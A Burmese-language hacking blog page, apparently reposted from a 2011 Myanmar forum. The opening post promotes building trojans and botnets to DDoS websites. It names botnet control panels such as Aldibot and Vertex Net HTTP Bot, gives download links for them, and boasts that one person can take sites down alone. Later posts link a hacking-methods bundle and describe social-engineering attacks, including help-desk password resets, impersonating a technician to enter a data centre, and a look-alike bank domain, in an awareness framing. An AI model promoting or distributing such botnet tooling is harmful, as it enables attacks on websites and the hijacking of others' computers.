Trojan attack Ddos T-

ျကားဖူးျကမွာပါ trojan ဆိုတာကို ေတာ့ က်ြန္ေတာ္လည္း botnet နည္းစနစ္နဲ့ပက္သက္ျပီးေတာ
ရွင္းျပဖူးပါတယ္ ကိုယ္ျပုလုပ္လိုက္တဲ့ trojan ေလးေတြက အင္တာနက္ကေနကူးဆက္ျပန္ပြားျပီးေတာ့
သူမ်ား computer ေတြကို လိုသလို ထိမ္းခ်ုပ္နိုင္ ေအာင္ျပုလုပ္ျပီ သည္ computer ေတြကို  dos attack နည္း
စနစ္အျဖစ္အသံုးျပုေအာင္လုပ္ထားတဲ့ virus နည္းစနစ္ကို botnet လို့ေခါ္ဆိုနိုင္ပါတယ္
ကိုယ္ျပုလုပ္ျပီးေတာ့ ေရးသားထားတဲံ ထရွိဂ်င္  နွင့္အျခား virus ေတြကို  က်ြမ္းက်င္တဲ့ ပညာရွင္ေတြက ဥပမာ က်ြန္ေတာ္ေပါ့  ကိုယ္ကိုလည္း Roll တင္ရေသးတယ္
ျပုလုပ္ေရးသားရပါတယ္ အဲ့ လို့ေရးသားတဲ့ ေနရာမွာ ထိန္း ခ်ုပ္ မွူ လုပ္မဲ့ နည္းစနစ္ ဆိုရင္ေတာ့ ကို္ေရးသားတဲ့
virus ေတြကို ထိမ္းခ်ုပ္ဖို့ အတြက္ေတာ့ ကိုယ္ေရးသားမွဴ နဲ့ ကိုက္ညီ အဆင္ေျပမဲ့ virus sever တစ္ခုေလာက္ရွိဖို့လိုပါမယ္

ဒီေကာင္ေလးက အရင္2011တံုးက အျမည္ မသိေကာင္ေတြသံုးဖူးတဲ့ဟာေလးပါ သူကေတာ့ online ကေနျပီေတာ့
ကိုယ္ေရးသားတဲ့ အေကာင္ေလးေတြကို လိုသလို ထိန္းခ်ုပ္တဲံ ဟာေလးပါ

ပံုမွာ ျမင္ေတြရတာ ေတာ့ ကိုေရးသားထားေသာ virusထိန္းခ်ူပ္မွူ ေအာက္ေရာက္ေနေသာ နိုင္ငံေတြ ရွိ computer
ေတြကိုျမင္ေတြရမွာပါ ျပီးေတာ့ မွာ dos attack အသြင္ျပာင္းျပီ website တစ္ခုကို နိုင္ငံအေတာ္မ်ားမ်ားက
တစ္ျပီူင္တည္း၀င္သလိုလုပ္ပါေတာ့မယ္
ဒါဟာ ထူးျခားျပီး စိတ္၀င္စားဖို့ ေကာင္းတဲ့  botnet နည္းစနစ္ပါဒီနည္းစနစ္ကို တက္ခ်င္ရင္ေတာ့
virus ေရးသားမွူတြင္ တက္က်ြမ္းနားလည္ရပါမယ္
ကိုယ္နဲံ ကိုညီမဲ့ ပရွိဂရမ္းမင္းတစ္ခုကို တက္ထားရမယ္ ေနာက္တစ္ခု ကေတာ့ PHP မျဖစ္မေနတက္ထားရပါမယ္
php ရဲ့ စြမ္းရည္က ေတာ့ အင္တာနက္ဆိုင္ရာ ထိန္းခ်ုပ္မွူေတြမွာ java ေတာင္မယွဥ္နိုင္ပါဘူး
java က software ေရးသားမွူ ေလ့လာရလြယ္မွူ ေတြ C ေလာက္စည္းကမ္းမျကီးမွူေတြေျကာင့္သာသြားတာပါ
i phone software ေရးသားမွူေတြမွာ သာပါတယ္
ဓီေကာင္ေလးကို
http://adf.ly/3XDuP ေဒါင္းလိုက္ပါ virus မပါဘူးေနာ္ ဒါက ထိန္းခ်ုပ္ဖို့ပဲ virus ကကိုယ္ဘာသာကိုယ္ေရး

ေနာက္တစ္ခု Aldibot ေလးကလည္း လူသံုးမ်ားပါတယ္

ဒီေကာင္လည္းဒ အထက္ကေကာင္လိုပါပဲ ျပုလုပ္ေရးသာရမွာ ကေတာ့ ကိုတာ၀န္ပါ

Vertex Net v1.2.1 HTTP Bot

ေလးကို ျဖန့္ေ၀လိုက္ပါမယ္ ဒီေကာင္က အေပါ္က ေကာင္ေတြလိုပဲ

ဒီေကာင္ကို
http://adf.ly/3XDuP ေဒါင္းလိုက္ပါ virus မပါဘူးေနာ္ ဒါက ထိန္းခ်ုပ္ဖို့ပဲ virus ကကိုယ္ဘာသာကိုယ္ေရးbotnet
နည္းစနစ္ကိုယ္တက္ရင္ ဆရာျဖစ္ျပီပဲ တစ္ေယာက္ထည္းနဲ့ Ddos attack ခ်လို့ရတယ္

copy from
http://myanmarhacking.lefora.com/2011/12/05/trojan-attack-ddos-t-/#post1

Read More ->>

Hacking နည္း 1000

ကၽြန္ေတာ္ဒီေကာင္ေလးကို ကိုညီေနမင္း ဆိုဒ္ကေန ယူထားတာပါ။
ဒီ ဖိုရမ္ေလးမွာလဲ ကၽြန္ေတာ့လို ေလ့လာေနတဲ့ လူငယ္ေတြရွိတဲ့အတြက္ေၾကာင့္ ျပန္လည္ေ၀မွ်လိုက္ရပါတယ္
ခၽြင္းခ်က္ကေတာ့ ရွိတယ္။ အကုန္လံုးက အဂၤလိပ္လိုေတြဗ်...
http://www.mediafire.com/?ho4jzgz5le216ej

Read More ->>

အသိ သတိ ပညာ

အသိပညာ ဗဟုသုတသည္ ဟက္ကာတုိ႔ရန္မွ ကာကြယ္ရန္ စြမ္းအားတစ္ခုၿဖစ္ေပသည္။ ယေန႔ေခတ္ အုိင္တီနယ္ပယ္ဆုိင္ရာ စီမံခန္႔ခြဲမႈတြင္ တာ၀န္ရွိသူမ်ားသည္ ၄င္းတုိ႔၏ user / customer မ်ားအား ဟက္ကာမ်ားရန္တြင္း သက္ဆင္းမႈမွ ကင္းေ၀းေအာင္ ထုိက္သင့္ေသာ နည္းပညာၿဖန္႔ေ၀မႈတြင္အားနည္းမႈမ်ားရွိေနၾကသည္။ နည္းပညာတစ္ခတ္ဆန္း လာခဲ႔တာနဲ႔ တန္းတူ ကြန္ပ်ဴတာဆုိတာ ေခတ္မွီလုပ္ငန္းတုိင္းမွာ မပါမရွိ၀င္ေရာက္လာတဲ႔ အသုံး၀င္ပစၥည္းတစ္ခုၿဖစ္လာပါတယ္။ ဒီလုိေနရာမ်ဳိးမွာ လူတုိင္းဟာ ကြန္ပ်ဴတာကုိ အကၽြမ္းက်င္ၾကီးမဟုတ္ေတာင္ အတုိင္းအတာတစ္ခုအထိ သိထားသင့္တယ္ဆုိရင္မွားမယ္မဟုတ္ပါဘူး။ စရင္းဇယားေတြလုပ္တဲ႔ ရုံး၀န္ထမ္းတစ္ဦး ကြန္ပ်ဴတာကုိဖြင့္လုိက္ Desktop အေပၚက Excel/Acess/UBS စသည့္ icon ေလးကုိ ႏုိပ္ကာ ေန႔တုိင္းလုပ္ေနရတဲ႔သူေတြဟာ virus ဆုိတာ ဘာမွန္းမသိတဲ႔သူေတြ မ်ားသလုိ online banking transaction ေတြကုိ ကုိင္ထားက်တဲ႔ စီးပြားေရးလုပ္ငန္းရွင္ေတြ၊ သူတုိ႔ရဲ႕ လူယုံ အတြင္းေရးမႈးစသည္ တုိ႔ေတြဟာ ဒီ Bank ရဲ႕ website ကုိဒီလုိ၀င္တယ္ .. ၿပီးရင္ ဒီမွာ click ႏုိပ္မယ္ .. ၿပီးရင္ အေပၚက box ေလးမွာ user name ေအာက္က box ေလးမွာ password ကုိ ရုိက္ထည့္မယ္ဆုိတာပဲ သိၾကပါတယ္။ ဒါမ်ဳိးေတြက ကၽြန္ေတာ္တုိ႔ အၿမဲေတြ႔ေနၾကေတြပါ။ (ကိုယ္ေတြ႕ဗ်...ဟီး)
ကဲ.. ၾကည့္ ဒီလုိလူေတြကုိ နည္းပညာနည္းနည္းကၽြမ္းက်င္တဲ႔ မသမာသူေတြက လုပ္ၾကံဖုိ႔ဆုိတာ ခက္တဲ႔ကိစၥမဟုတ္ပါဘူး။ ဒါေတြဟာ လုပ္ငန္းရဲ႕ IT Manager (အိုင္တီတြင္တာ၀န္ရွိသူ) ရဲ႕ အရည္အခ်င္းညံ့ဖ်င္းမႈ႕ေၾကာင့္လည္း ၿဖင့္ၿပီး Company တစ္ခုမွာ သက္ဆုိင္ရာ Human Resources or Administration Department / IT Department / Accounting Department စသည္ ၿဖင့္ခြဲထားၾကတာမ်ားပါတယ္။ ဒီလုိေနရာမ်ဳိးေတြမွာ ကၽြန္ေတာ္တုိ႔ေတြဟာ တစ္ပတ္ကုိ အနည္းဆုံး ၃၀ မိနစ္ေလာက္ နည္းပညာအတြက္ အစည္းအေ၀း (meeting) လုပ္ကာ အိုင္တီပုိင္းဆုိင္ရာ တာ၀န္ရွိသူေတြဟာ မိမိတုိ႔ရဲ႕ ၀န္ထမ္းေတြကုိ ေခတ္ရဲ႕နည္းပညာနဲ႔ေလ်ာ္ညီတဲ႔ ဗဟုသုတေတြကုိ အခ်ိန္နဲ႔ တစ္ေၿပးညီ ၿဖန္႔ေ၀ေပးႏုိင္ဖုိ႔ပါ။ ဘယ္လုိ၀န္ထမ္းကမွ ဘယ္သူက ဘယ္သူ႔ကုိ ဟက္သြားလဲ၊ ဘယ္ security ကဘယ္လုိ။ စသည့္ သူတုိ႔နဲ႔ မဆုိင္တာကုိေမးမွာမဟုတ္ပါဘူး( ဘယ္မင္းသား ဘယ္မင္းသမီးက ဘယ္လုိေလးေခ်ာတာ၊ ဟုိေကာင္ေလးနဲ႔ ဟုိေကာင္မေလးက ဘာၿဖစ္ေနတယ္ဆုိပဲ - ဒါေတြပဲေမးရင္ေမးမွာေပါ႔)။ ဒါေပမဲ႔ ၄င္းကဲ႔သုိ႔ေသာ user ေတြ (မသိေသးတာေကာ သိရွိၿပီးသားေတြ) ကုိ ဗဟုသုတရဖြယ္ ေၿပာဆုိ ေဆြးေႏြးသင့္ပါတယ္။ ဒီလုိေၿပာတဲ႔ေနရာမွာ ဘယ္သူက ဘယ္လုိဆုိတာေတြေၿပာယုံတင္မကဘူး ၄င္းတုိ႔ကုိ ကာကြယ္တဲ႔နည္းပညာေလးေတြပါ User အမ်ားစုသိသင့္သေလာက္ေၿပာဆုိထားသင့္ပါတယ္။
ဟက္ကင္းကုိ ယေန႔အခ်ိန္မွာေတာ့ လူတုိင္းနည္းပါးၾကားဖူးပါတယ္။ ဒါေပမဲ႔ ဟက္ကင္းဆုိတာ ဘာလဲလုိ႔ေၿပာရင္ေတာ့ တိတိက်က်မသိပါဘူး။ Cyber သူခုိးေတြလုိ႔ပဲ ထင္ခ်င္ထင္ပါလိမ့္မယ္။
"ဟက္ကင္း - hacking" ကုိ တနည္းအားၿဖင့္ "cyber terrorism - နည္းပညာပုိင္းမွာ အၾကမ္းဖက္၀ါဒ၊ လုပ္ငန္း" လုိ႔လည္းေခၚၾကပါတယ္။ ကြန္ပ်ဴတာ ဟက္ကင္းဆုိတာကေတာ့ ခြင့္ၿပဳခ်က္မရွိပဲ ကြန္ပ်ဴတာ နဲ႔ အင္တာနက္ Networks ကုိ ေဖာက္ထြင္း ၀င္ေရာက္ အသုံးၿပဳၿခင္းလုိ႔ အက်ဥ္းခ်ဳံးၿပီးေၿပာလုိ႔ရပါတယ္။ ေကာင္းတဲ႔ဘက္ကၾကည့္ရင္ ကြန္ပ်ဴတာနည္းပညာမွာ System ေတြဘယ္လုိ အလုပ္လဲဆုိတာေတြကုိ သူမ်ားေတြထက္ထူးကဲစြာ ေဖာက္ထြင္း၀င္ေရာက္ၾကတဲ႔သူေတြပါ (နည္းပညာတစ္ေခတ္ဆန္းေစဖုိ႔ ေရွ႕ေဆာင္လမ္းၿပေတြေပါ႔)။ ဒါေပမဲ႔ မ်ားေသာအားၿဖင့္ကေတာ့ တရားမ၀င္ သာၿဖစ္ပါတယ္။
ဟက္ကင္းတြင္
1. Website Hacking (လုံၿခဳံေရးခ်ထားေသာ အင္တာနက္ webpage မ်ားအတြင္းသို ၀င္ေရာက္ၿခင္း)
2. Hacking Computers (အသုံးၿပဳေနသူတစ္ေယာက္ ကြန္ပ်ဴတာနဲ႔ အင္တာနက္အသုံးၿပဳေနစဥ္ ၄င္းကြန္ပ်ဴတာအတြင္းသုိ႔၀င္ေရာက္ၿခင္း)
3. Server Hacking (အေရးၾကီးေသာ သတင္း၊အခ်က္အလက္မ်ားကုိရယူရန္ သုိ႔မဟုတ္ အႏၱရယ္ၿဖစ္ေစေသာ virus မ်ားကုိထည့္သြင္းရန္အတြက္ server အတြင္းသုိ႔၀င္ေရာက္ခ်ဥ္းကပ္ၿခင္း)
တုိက္ခုိက္ႏုိင္ေသာ နည္းပညာ အေၿမာက္အမ်ားရွိရာတြင္-
SQL Injection Hack
Cross site scripting ( XSS )
Denial of service ( Ddos attack )
Cookie Poisoning
Password Cracking
* Dictionary attack
* Hybrid attack
* Brute force attack
Phishing
Keystroke Logging
Login Spoofing
Shoulder Surfing
Spyware
Trojan Horse
Mule Scam
FTP
HTTP
rpc.statd
NetBIOS
ICMP Ping စသည္စသည္ ၿဖင့္ေပါ႔.. အမ်ားၾကီးပါ။

Social engineering နည္းပညာ
အရင္က Social Engineering ကုိ အသုံးၿပဳသူ (user) ေတြအား ကူညီမႈအသြင္ ၿဖင့္ သက္ဆုိရင္ HelpDesk/Suport Department ပုံစံဟန္ေဆာင္ၿပီး ၀င္ေရာက္ခဲ႔ၾကေပမဲ႔ ယေန႔အခ်ိန္မွာေတာ့ အံမခန္းေအာင္ နည္းပရိယာယ္ေတြ ၾကြယ္၀လာၾကပါတယ္။ ကြန္ပ်ဴတာ နည္းပညာကုိ အထူးသိကၽြမ္းစရာ မလုိပဲအထုိက္အေလ်ာက္တတ္ကၽြမ္းယုံနဲ႔ အလြယ္တကူ လုပ္ယူႏုိင္တာ ၿဖစ္တဲ႔အတြက္ ယေန႔ေခတ္မွာ ေတာ္ေတာ္မ်ားမ်ားသုံးေနၾကတာကုိေတြ႔ရပါတယ္။ ဒါဟာ user ေတြရဲ႕ အားနည္းခ်က္ကုိယူတာပဲၿဖစ္ပါတယ္
(ကၽြန္ေတာ္ဖတ္ရတဲ႔ စာေလးထဲက ေကာက္ႏုတ္လုိက္ပါမယ္။)
John ဟာ လုံၿခံဳေရးဆုိင္ရာ စီစစ္လုပ္ကုိင္ရန္ (Security Analyst) အတြက္ Company တစ္ခုရဲ႕၀န္ထမ္းတစ္ေယာက္ပါ။ သူအလုပ္၀င္လို႔ ပထမဦးဆုံး လုပ္ကုိင္တာ၀န္ယူရတာကေတာ့ Company ရဲ႕ လုံၿခံဳေရးေတြကုိ ေစာင့္ၾကည့္ဖုိ႔ပဲ။ ဒီေနရာမွာ ကၽြန္ေတာ္အေပၚကေၿပာခဲ႔တဲ႔အတုိင္းပါပဲ John က ၀န္းထမ္းအသစ္ၿဖစ္ေပမဲ႔ ယခုလက္ရွိ ၀န္ထမ္းေတြဟာ ဘယ္လုိ security ေတြနဲ႔၊ Knowledge ေတြဘယ္ေလာက္မ်ားမ်ားပုိင္ဆုိင္ထားတယ္ဆုိတာကုိ စမ္းသပ္ခ်င္တဲ႔အတြက္ မိမိကုိယ္ကုိ Attacker တစ္ေယာက္အၿဖစ္ မခံယူခ်င္ေပမဲ႔ သူက ပထမဦးဆုံး စိတ္၀င္စားဖြယ္ Attacking ႏွစ္ခုကုိ လုပ္ခဲ႔ပါတယ္။
၀န္ထမ္းအသစ္ဆုိေတာ့ သူ႔ကုိဘယ္သူမွ ေကာင္းေကာင္းမသိေသးပါဘူး။ John ကလည္း သူမ်ားေတြကုိမသိေသးပါဘူး။ ဒီလုိမသိေသးတာကလည္း သူ႔အတြက္ အခြင့္အေရးေကာင္းတစ္ခုလုိ႔ေၿပာမယ္ဆုိရင္ မွားႏုိင္စရာမရွိပါဘူး။ သူပထမဦးဆုံး Social Engineering Attack က Company ရဲ႕ HelpDesk ပါ။ သူ ဖုန္းကုိေကာက္ကုိင္ၿပီး remote user အတြက္ password reset လုပ္ေပးဖုိ႔ လွမ္းေတာင္းလုိက္ပါတယ္။ ဒီေတာ့ HelpDesk က ခဏေစာင့္ပါဦး ဟုဆုိကာ Login ID ကုိ ေပးပါတယ္။ ဒီေတာ့ John က Company ရဲ႕ Login ID ေတြမွာ အမည္ေပးတဲ႔ system ကုိသူနားလည္သြားပါတယ္။ ဘာေၾကာင့္လဲဆုိေတာ့ နာမည္ေရွ႕စာလုံး နဲ႔ ဒုတိယနာမည္ရဲ႕ ေရွ႕ဆုံးအလုံးေတြကုိ ယူသုံးထားတာပါ။ ဒီေတာ့ CIO (Chief Information Officer) ရဲ႕ ID ကုိသူသိလုိက္ပါၿပီ။ CIO ရဲ႕ အမည္က Jeff နဲ႔ ေနာက္ အမည္ကေတာ့ Ronald ပါ။ ဒီေတာ့ Login ID က JeffR ဆုိတာ သိသြားတာေပါ႔။ CIO ရဲ႕ နာမည္အရင္းကုိေတာ့ Company ရဲ႕ Phone Directory ထဲမွာ ရွာလုိက္လုိ႔ရၿပီေလ...
ေနာက္တစ္ၾကိမ္ဖုန္း John က HelpDesk ကုိဖုန္းထပ္ဆက္ပါတယ္။ ဒီလုိဆက္ၿပီး ID နဲ႔ Password ေတြကုိ အၾကိမ္ၾကိမ္ေတာင္းေနတာ တစ္ေန႔ကုိ အၾကိမ္တစ္ေထာင္မွ် Password Reset လုပ္ေပးေနရေသာ HelpDesk အတြက္ အထူးအဆန္းေတာ့မဟုတ္ပါဘူး။ Password Reset မွာ John ရဲ႕ password ကိ "friday" ၿဖစ္ပါတယ္။ ဘာေၾကာင့္လဲဆုိေတာ့ သူေတာင္းတဲ႔ေန႔က ေသာၾကာေန႔ၿဖစ္ေနလုိ႔ပါ။ ကဲ... ၅ မိနစ္အတြင္းမွာ CIO ရဲ႕ Password ကုိ သူသိသြားတာေပါ႔။ ဒီေတာ့ အထဲမွာ CIO ရဲ႕ shared files ေတြ နဲ႔ သူ႔ရဲ႕ ေမးလ္ေတြကုိ ၀င္ဖတ္လုိ႔ရသြားၿပီ။
ေနာက္ထပ္ Social Engineering Attack ကေတာ့ John မွာ ၿပည္တြင္း တယ္လီဖုန္းဆက္သြယ္မႈရုံးတြင္လုပ္ကုိင္ေနေသာ သူငယ္ခ်င္းတစ္ေယာက္ရွိပါတယ္။ ဒီေတာ့ John က သူ႔ သူငယ္ခ်င္းရဲ႕ အ၀တ္အစားေတြ၊ တံဆိပ္နဲ႔ အသုံးၿပဳႏုိင္ဖြယ္ရာကိရိယာအနည္းငယ္ကုိယူသြားပါတ ယ္။ သူဦးတည္ သြားတဲ႔ေနရာက သူ႔ Company ရဲ႕ တစ္ၿခား Campus တစ္ခုပါ။ တစ္နည္းအားၿဖင့္ လက္ရွိ Company ရဲ႕ အေရးၾကီးတဲ႔ Information Data ေတြကုိ အေၿခအေနမေကာင္းေတာ့တဲ႔ Router နဲ႔ Server ေတြဆီကေန Recovery လုပ္တဲ႔ဆီေပါ႔။ ပထမဦးဆုံး သူက Campus ရဲ႕ လုံၿခဳံေရးရုံးကုိ ဆက္သြယ္ေရး ၀တ္စုံအၿပည့္နဲ႔သြားၿပီး Local Exchange Carrier (LEC) က ေခၚလုိ႔ တယ္လီဖုန္းလုိင္း circuit ေတြကုိ စစ္ေဆးဖုိ႔အတြက္ေပါ႔ေၿပာပါတယ္။ တစ္ဆက္တည္းမွာပဲ Smart Jack (အထူးသၿဖင့္ နံရံတြင္ Circuit Board ေလးၿဖင့္ မီးေလးလင္းေနတတ္သည္။ အနည္းဆုံး RJ45 ႏွင့္ RJ21x သုိ႔မဟုတ္ တစ္ၿခား ဆက္သြယ္ေရးဆုိင္ရာ Device မ်ားတတ္ဆင္ရန္ ) မွာရွိတဲ႔ alarms ေတြကုိလည္း စစ္ရမွာၿဖစ္တဲ႔အတြက္ Data Center ထဲကုိ၀င္ဖုိ႔လုိေၾကာင္းေၿပာပါတယ္။
Data Center မွာ တာ၀န္က်တဲ႔ Administrator ကလည္း John ရဲ႕ ID ကုိေတာင္ checking မလုပ္ေတာ့ပါဘူး။ Administrator ကေတာ့ ေဘးနားကေန ရစ္သီရစ္သီနဲ႔လုပ္ေနတာေပါ႔။ မိနစ္အနည္းငယ္ၾကာတဲ႔အခါ John က တာ၀န္က် Administrator ကုိ စမ္းသပ္မႈအခ်ဳိ႕ၿပဳလုပ္ရမွာၿဖစ္ပါတယ္။ ဒါေၾကာင့္ သူ တယ္လီဖုန္းရုံးကုိဖုန္းၿပန္ေခၚကာ Smart Jack ကုိပိတ္ၿပီး စစ္ေဆးရမွာၿဖစ္တဲ႔အတြက္ ၄၅ မိနစ္ေလာက္ၾကာပါလိမ့္မယ္လုိ႔ေၿပာလုိက္ေတာ့ Administrator က ဒါဆုိရင္ သူ႔ Pager နံပါတ္ေလးကုိယူထား ၿပီးရင္ သူ႔ကုိေခၚလုိက္ ဆုိၿပီးေၿပာပါတယ္။ အခုဆုိရင္ John ရယ္ အလုံး ၃၀ ရွိတဲ႔ Server racks (storage ေတြ စီၿပီးထည့္ထားေသာ အိမ္ (စဥ္)) ေတြရယ္ ပဲ ရွိပါတယ္။
ဒီေတာ့ John မွာ ကြဲၿပားတဲ႔ အခြင့္အေရးအနည္းငယ္ရွိပါတယ္။ သူ server တုိင္းကုိ သြားေရာက္ၿပီး unlocked consoles ေတြကုိ လုိက္ၾကည့္မယ္ သုိ႔မဟုတ္ လြတ္ေနတဲ႔ အေပါက္ကေနၿပီးေတာ့ သူ႔ laptop နဲ႔ sniffing လုပ္ယူမယ္ေပါ႔။ သူကေတာ့ ဘယ္ေလာက္ရရ ရသေလာက္အကုန္ယူမွာၿဖစ္တဲ႔အတြက္။ သူ open console ေတြကုိရွာပါတယ္။ ၅ မိ္နစ္ေလာက္အၾကာမွာ KVM slot ေတြအားလုံးစစ္တယ္ ၿပီးရင္ Windows NT server ကုိသုံးထားေသာ Domain ေတြအတြက္ Backup Domain Controller ကုိ ဘယ္ server အလုပ္လုပ္ေနလဲဆုိတာကို စစ္ပါတယ္။ ၿပီးေတာ့ သူ႔မွာပါတဲ႔ L0phtCrack CD တစ္ခ်က္ကုိထုတ္ၿပီး BDC (Backup Domain Controller) မွာ install လုပ္ကာ Dictionary Attack ကုိ စလုိက္ပါတယ္။ ၅ မိနစ္ေလာက္အၾကာမွာ သူ password ရသြားပါတယ္။ ကဲ ၾကည့္ password က "Yankees" တဲ႔...
(ဒါက social engineering attack ကုိေၿပာၿပတာပါ)
by @ Robert J. Shimonski (Truesecure TICSA, Cisco CCDP, CCNP, Nortel NNCSS, Microsoft MCSE, MCP+I, Novell Master CNE, CIP, CIBS, IWA CWP, Prosoft CIW, SANS GSEC, GCIH, CompTIA Server+, Network+, Inet+, A+, e-Biz+, Symantec SPS and NAI Sniffer SCP) သူေရးထားတာေလးပါ။ သူ႔ရဲ႕ Cerftificate ေတြကုိအားက်ေစေအာင္လုိ႔ တမင္ထည့္ေပးထားတာပါ။
ဒီလုိ Social Engineering မွာ ၾကည့္မယ္ဆုိရင္ သူ႔လက္ေအာက္မွာ ခြဲထားတာေလးေတြရွိပါေသးတယ္။
Relationship social engineering
သူကေတာ့ မိတ္ေဆြဖြဲ႕မယ္.. စကားခ်ဳိခ်ဳိသာသာေလးေတြေၿပာကာ အတြင္းက မိမိရဲ႕ Information ကုိႏုိက္ယူတာပါ။
Social engineer: “My kids will love this product. I have a two-year-old named Fred and an eight-year-old named Beth. Do you have any kids?”
User: “Yes, I have a four-year-old son named Shawn.”
ဒါေလးက အၿပစ္ကင္းစင္တဲ႔ chitchat ေၿပာတာပါ။ ဒါေပမဲ႔ hacker ေတြက အၾကံနဲ႔ေၿပာတာပါ။
Password conundrum
ကၽြန္ေတာ္တုိ႔ေတြ Gmail/Yahoo/MSN စသည့္အၿပင္ Friendset/Fackbook ကဲ႔သုိ႔ေသာ social site ေတြ တစ္ၿခား ဖုိရမ္ေတြ စသည္ ၿဖင့္ user name နဲ႔ Password ေတြကုိအၿမဲေပးၾကရပါတယ္။ ဒီေတာ့ တစ္ခ်ဳိ႕က ေမးလ္နဲ႔ social / forums စသည္တုိ႔ကုိ တစ္ခုတည္းေပးတာပါ။ သူတုိ႔ကေတာ့ မ်ားေတာ့ မမွတ္မိမွာစုိးလုိ႔တဲ႕။ ဟက္ကာေတြက သူတုိ႔အဖြဲ႕ေတြဖြဲ႕တယ္..ၿပီးရင္ လူအမ်ားႏွစ္သက္ႏုိင္တဲ႔ site တစ္ခုေထာင္တယ္.. လူတုိင္းအဲ႔ကုိ၀င္ၾကည့္တယ္ေပါ႔.... ဒီေတာ့ မိမိတုိ႔ရဲ႕ site မွာ မိမိလုိခ်င္တဲ႔သူရဲ႕ information ကုိလုိခ်င္ရင္ password ကုိလုိခ်င္ရင္ အလြယ္ေလးပါ။ ဒါေပမဲ႔ User ေတြကေတာ့ Hacker ေတြဆုိတာ အဲ႔လုိေနရာမ်ဳိးမွာလည္း မ်က္ႏွာဖုံး စြပ္ၿပီးေနတတ္ၾကတယ္ဆုိတာ မသိပါဘူး။
New twist to an old scheme
ဒါကေတာ့ အရင္အတုိင္းပါပဲ... အေဟာင္းထဲကအေကာင္းနည္းပညာေပါ႔။ ၿမန္မာႏုိင္ငံသား (ဦးဘယ္သူ ) တစ္ေယာက္ေပါ႔ Visa နဲ႔ အြန္လုိင္းကေန e-Banking ေလးတစ္ခုလုပ္ဖုိ႔အတြက္ e-Banking အေကာင့္တစ္ခု လုပ္ထားပါတယ္... သူက ကြန္ပ်ဴတာကုိ စတင္ၿပီးသုံးတတ္တာဆုိလုိ႔ မေလးရွားေရာက္မွ သုံးတတ္တာ... အင္တာနက္ဆုိလုိ႔ နဲနဲပါးပါးပဲသိတာ... သူနဲ႔ အခန္းကပ္ရပ္က လူတစ္ေယာက္ ဒီကုိသြား ဒီကုိႏုိပ္ဆုိုလို႔ နဲနဲပဲသိတာ.. ေငြေၿပာင္းေငြလြဲေလး နဲနဲေတာ့သိတယ္ေပါ႔။ တစ္ေန႔မွာ သူ႔ဆီကုိဖုန္းေခၚပါတယ္... "ဟလုိ မဂ္လာပါ", ကၽြန္မတုိ႔ကေတာ့ (တက္တက္ေၿပာင္) ဘဏ္ ကၿဖစ္ပါတယ္။ လူၾကီးမင္းရဲ႕ အမည္ ဦးဘယ္သူ Passport နံပါတ္ 123456 ၿဖစ္ၿပီး လက္ရွိ system error ေၾကာင့္ မိတ္ေဆြရဲ႕ အေကာင့္ကုိ ၿပန္လည္၍ activate လုပ္ရန္ၿဖစ္ပါတယ္။ ဒါေၾကာင့္ www.abcd.com ကုိသြားၿပီး Login ၀င္ကာ activate ၿပန္လုပ္ရပါလိမ့္မယ္"... ဖုန္းဆက္လုိက္တဲ႔ ေကာင္မေလးရဲ႕ အသံကလည္း အရမ္းခ်ဳိသာေနေတာ့ ဘာမွန္းေတာင္မသိဘူး တန္းၿပီး ကြန္ပ်ဴတာ ေရွ႕ကုိေၿပးတယ္.. ၿပီးေတာ့ ေစာေစာက ေကာင္မေလးေၿပာတဲ႔အတုိင္းပဲ user name နဲ႔ password ကုိရုိက္ထည့္ကာ ၀င္လုိက္ပါတယ္။ အားလုံးအဆင္ေၿပသြားတယ္... တကယ္ေတာ့ သူ႔ရဲ႕ data ေတြအားလုံးက hacker ရဲ႕ လက္ထဲကုိေရာက္သြားပါၿပီ။
ဒါေပမဲ႔ သူကံေကာင္းပါတယ္.. သူ႔ Credit Card မွာလည္း ဘာမွမထည့္ထားေသးပါဘူး။ ရွိရင္လည္း ေၿပာင္ေနဦးမယ္။
တကယ္ေတာ့ ဟက္ကာက http://www.hongleongonline.com.my/ အစား http://www.hongleongonlines.com.my/ ပုံစံမ်ဳိးလုပ္ယူသြားတာပါ။ သူတုိ႔က ၄င္းပုံစံတူ Domain တစ္ခုယူကာ ပုံစံတူ website တစ္ခုကုိ တည္ေဆာက္ထားတာၿဖစ္တဲ႔အတြက္ ဘယ္သူကေကာ သိႏုိင္မွာလဲ။ user ေတြရဲ႕ ဘက္ကေန နည္းပညာနဲ႔ပက္သက္ၿပီးအားနည္းတဲ႔အခ်က္ေလးေတြပါ။
Windows XP remote assistance scheme
Social Engineering ထဲမွာ exploiting Windows XP’s remote assistance ကလည္း တစ္ခုအပါအ၀င္ပါ။ user ေတြရဲ႕ ကြန္ပ်ဴတာကုိ IT Department က အကူအညီေပးမည့္အသြင္ၿဖင့္ exploiting ၿဖစ္ေနေသာ XP's remote assistance ကုိၿပင္ရန္ Security Path တစ္ခုသြင္းဖုိ႔ရွိေၾကာင္းေၿပာပါလိိမ့္မယ္။ ၿပီးရင္ ၄င္းမွတစ္ဆင့္ ၾကိဳတင္စီစဥ္ထားတဲ႔ spyware ေတြကုိ မိမိရဲ႕ စက္ထဲကုိ သြင္းက User name & password ေတြကုိရယူၿခင္းၿဖစ္ပါတယ္။
Chat trick
ေစာေစာက ဖုန္းကုိသုံး လိမ္ညာတယ္... အခုေတာ့ chat ကုိသုံးၿပီး အယုံသြင္းလွည့္ၿဖားလာၾကပါတယ္။ Internet security Web site CERT ရဲ႕ အဆုိအရ အၿဖစ္အမ်ားဆုံးက IRC-based chat ေတြပါ။ ၄င္းတုိ႔က spyware module ေတြကုိ ၄င္းထဲမွာ user အခ်င္းခ်င္းၿဖန္႔ခ်ီၾကတာပါ။ အဓိက ကေတာ့ hacker ေတြက ဒီလုိနည္းလမ္းၿဖင့္ distributed denial of service attack လုိ႔ေခၚတဲ႔ တုိက္ခုိက္မႈမွာ အသုံးခ်ႏုိင္ေအာင္ zoombie ေတြကုိ ဖန္တီးၾကတာပါပဲ။

http://myanmarhacking.lefora.com/2011/10/01/20111001145659/#post2

Read More ->>

http:// အေပၚနားလည္ျခင္း

What is URL?

URL=Uniform resource locator

အထက္ကအဓိပါယ္ကို ကိုယ္ဘာသာပဲ ျပန္လိုက္ေတာ့.....................ဟဲဟဲ။
ေနာက္တစ္ခု URL တစ္ခုအျပည့္အစံုကိုေလ့လာမယ္။

example:
http://www.google.com/maps

အဲဒီ့ URL ေလးကိုကၽြန္ေတာ္အေသးစိတ္ခဲြျပီးရွင္းျပပါ့မယ္ 


